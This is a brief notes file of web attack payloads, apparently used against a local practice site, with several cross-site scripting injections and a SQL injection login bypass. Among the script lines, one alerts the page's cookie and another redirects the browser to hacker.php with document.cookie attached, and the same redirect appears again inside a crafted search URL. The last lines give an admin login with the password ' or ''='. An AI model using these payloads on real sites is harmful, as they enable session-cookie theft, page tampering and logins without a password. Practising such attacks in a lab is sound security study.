
<script>alert("Hello")</script>
<script>document.body.style.background="#000"</script>
<script>var x = document.getElementsByClassName("author")[0]; x.innerHTML = "Mlem Mlem...";</script>

<script>alert(document.cookie)</script>

<script>window.location.assign("hacker.php?cookie="%2bdocument.cookie);</script>
http://localhost/atw/book.php?search=%3Cscript%3Ewindow.location.assign(%22hacker.php?cookie=%22%2bdocument.cookie);%3C/script%3E

SQL Injection

login no pass

username: admin
password: ' or ''='